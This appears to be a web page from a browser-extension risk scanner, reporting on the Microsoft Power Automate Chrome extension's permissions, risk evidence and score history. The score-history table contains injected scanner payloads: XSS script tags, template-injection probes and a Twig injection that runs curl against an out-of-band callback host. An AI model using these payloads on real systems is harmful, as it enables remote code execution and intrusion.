Microsoft Power Automate
ljglajjnnkapghbckkcmodicjhacbfhk
Risk Score
3.26
Risk Level:
Low
Recommendation:
🟢 LOW RISK — review
Top Risks
- debugger permission used in code: can intercept all page data, XHR, and DOM across 10M installs
- nativeMessaging to unrecognized companion app bypasses browser sandbox
- browsingData + <all_urls> enables full session cookie and history deletion
- Privacy policy fetch failed — data handling unverifiable for this extension
- Rating 2.0 indicates significant user-reported dissatisfaction at scale
Evidence
- debugger_attach confirmed in code crx background.js calls chrome.debugger.attach({tabId}) — highest-risk API, can read all network/DOM.
- High-capability permission cluster manifest debugger + browsingData + nativeMessaging + scripting + <all_urls> — full-compromise surface.
- Recognized organization (Microsoft) store developer_domain microsoft.com resolves; brand_mention.confirmed_owner=true; not impersonation.
- Privacy policy unfetchable api privacy_policy_classification.fetched=false (fetch_error:HTTPError); scored as +10.0 privacy pillar.
- native_messaging publisher_recognized=true crx Companion app publisher is recognized — +0 penalty on native messaging sanity check.
- No CVEs, no obfuscation, no external JS hosts crx cve_findings_raw empty; obfuscation_score=0.0; js_external_hosts empty.
- Capability gate blocks recognized-org discount manifest v2 rule 0b: debugger+browsingData+nativeMessaging+broad host are HIGH-impact; -2.0 org discount blocked.
- Low rating at massive scale store Rating 2.0 across 10M installs is notable negative signal, though no review red flags matched.
Permissions Breakdown
- scripting medium Can inject scripts into pages; medium risk on its own.
- debugger high Full debugger protocol access; can intercept all page data and network traffic.
- tabs medium Access to tab URLs and metadata across all open tabs.
- browsingData high Can delete cookies, cache, and history — broad data destruction capability.
- nativeMessaging high Communicates with native desktop app; escape from browser sandbox.
- webNavigation medium Observes all navigation events across all URLs.
- <all_urls> high Host permission covering all URLs; amplifies every other permission.
- http://*/* high Redundant broad host; covered by <all_urls> — anti-double-count applied.
- https://*/* high Redundant broad host; covered by <all_urls> — anti-double-count applied.
Pillar Scores
Permissions8.50
Reputation2.00
Network2.00
Webstore2.50
Maintenance0.00
Privacy10.00
Code Quality2.50
CVE Exposure0.00
Scoring History
| sssiedn8fc0c604dp727562726963xsx | 3.37 | Low | review | 2026-09-06 |
| %22fsssiedxtfdsaxax><!--></ScRiPt>asddsssiedx | 3.51 | Low | review | 2026-08-22 |
| 'fsssiedxtfdsaxax><!--></ScRiPt>asddsssiedx | 3.33 | Low | review | 2026-08-22 |
| "fsssiedxt$'sssiedx | 3.58 | Low | review | 2026-08-22 |
| <fsssiedxf | 3.43 | Low | review | 2026-08-22 |
| <fsssiedx{$"sssiedx | 3.39 | Low | review | 2026-08-22 |
| fsssiedx<sssiedx | 3.65 | Low | review | 2026-08-22 |
| 'fsssiedxa'sssiedx | 3.64 | Low | review | 2026-08-20 |
| 3.17 | Low | review | 2026-08-20 | |
| $"fsssiedxa"sssiedx | 3.68 | Low | review | 2026-08-20 |
| fsssiedxa$"sssiedx | 3.23 | Low | review | 2026-08-20 |
| <fsssiedxa'sssiedx | 3.60 | Low | review | 2026-08-20 |
| <fsssiedxa$"sssiedx | 3.77 | Low | review | 2026-08-20 |
| <fsssiedxafdsaxax><!--></ScRiPt>asddsssiedx | 3.72 | Low | review | 2026-08-20 |
| <fsssiedxa xx psssiedx | 3.64 | Low | review | 2026-08-20 |
| <fsssiedxa'sssiedx | 3.77 | Low | review | 2026-08-20 |
| <fsssiedxa$'sssiedx | 3.47 | Low | review | 2026-08-20 |
| fsssiedxa<sssiedx | 3.54 | Low | review | 2026-08-20 |
| <fsssiedxhfdsaxax><!--></ScRiPt>asddsssiedx | 3.87 | Low | review | 2026-08-13 |
| <fsssiedx{ xx psssiedx | 3.58 | Low | review | 2026-08-13 |
| %22fsssiedxg xx psssiedx | 3.51 | Low | review | 2026-08-13 |
| 'fsssiedxg sssiedx | 3.77 | Low | review | 2026-08-13 |
| fsssiedxg<sssiedx | 3.31 | Low | review | 2026-08-13 |
| v3.6"onmouseover=f3di(98312)" | 3.68 | Low | review | 2026-08-05 |
| dfb[[${98991*97996}]]xca | 3.81 | Low | review | 2026-08-05 |
| v3.6&n943555=v966581 | 3.66 | Low | review | 2026-08-05 |
| sssieddrubricxsx | 3.64 | Low | review | 2026-07-31 |
| v3.6</script><script>iMzC(9604)</script> | 3.74 | Low | review | 2026-07-29 |
| v3.6"><script>iMzC(9083)</script> | 3.56 | Low | review | 2026-07-29 |
| v3.6" Ie7T=iMzC([!+!]) Nav=" | 3.15 | Low | review | 2026-07-29 |
| dfb{{98991*97996}}xca | 3.06 | Low | review | 2026-07-29 |
| 1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%> | 3.78 | Low | review | 2026-07-29 |
| <th:t="${dfb}#foreach | 3.76 | Low | review | 2026-07-29 |
| {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitlyeumqwjaab403f.bxss.me")}} | 3.24 | Low | review | 2026-07-29 |
| v3.6 | 3.26 | Low | review | 2026-06-16 |
Bookkeeping
Rubric v3.6
Scored at 2026-06-16 07:51
Listing SHA
5f4be66c34df…
Force block
— not fired
Score recovered
no
Elapsed
24.5s